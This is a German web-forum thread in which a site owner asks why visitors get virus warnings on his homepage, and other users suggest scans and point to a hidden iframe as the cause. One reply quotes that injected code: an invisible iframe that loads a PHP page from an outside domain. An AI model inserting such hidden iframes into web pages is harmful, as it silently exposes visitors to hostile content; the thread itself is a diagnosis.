Sponsor-Board.de

Normale Version: Virus was tun?
Du siehst gerade eine vereinfachte Darstellung unserer Inhalte. Normale Ansicht mit richtiger Formatierung.
Guten Tag zu samen,

ich hab jetzt schon ein paar Mal gemeldet bekommen das sich wohl auf meiner Webseite ein Virus befinden soll. Einige Leute bekommen diese Meldung, wenn sie auf meine Seite gehen:

In den HTTP-Daten der angeforderten Seite wurde ein Virus oder ein unerwünschtes Programm gefunden.

Ich bekomme diese nicht, wenn da jetzt wirklich ein Virus ist, wo ich mal von ausgehe wie bekomme ich den weg oder was muss ich tun?

Der Link ist:
[Link: Registrierung erforderlich]

Mit freundlichen Grüßen
Deutsche fun Gamer
R.Heuke
Quellcode und eigenen PC überprüfen, evtl noch nach verdächtigen Dateien ausschau halten
Einen Virenscan laufen lassen?

Ich halte es zumindest mit meinem Rechner so, dass ich Ihn alle 2 Monate neu aufsetze. Dafür spare ich es mir an Firewall und Virenprogrammen.

MfG
Darkwave
Auf deiner Homepage ist kein virus.

AeroCool schrieb:
Auf deiner Homepage ist kein virus.


Es handelt sich da um "Hidden Iframes", welche unnötig sind und meistens dann als Trojaner/Virus etc. eingestuft werden. Alex hatte im anderen Topic ja einen netten Link gepostet:

[Link: Registrierung erforderlich]

Code:
<iframe src="****://mignonbahn.de/bilder/.tss/sas/index.php" width="10" border="1" height="10" style="visibility:hidden">

Weitere Details:
[Link: Registrierung erforderlich]

Also ich find nichts bei mir :S
Das ist teilweise auch kaspersky ...
momentan fragt er mich sogar ob ich Zugriff zu bestimmten Foren will (gutefrage unc co.) ...
unnötig, wollte mich letztens wo einloggen dann kam das auch Biggrin
iframe bla bla unnötig nervig das ganze ^^.

Zu darkwave... alle 2 monate hm ok ich hatte innerhalb von 4 Stunden ein Virus auf meinem Notebook, weil meine Norton Lizenz abgelaufen war und er den Dienst quittierte, sehr charmant ...

Alle 2 Monate die ganzen Programme installieren ^^ puuuh, hast dun image was du schnellmal drüberziehst oder was? Biggrin
Referenz-URLs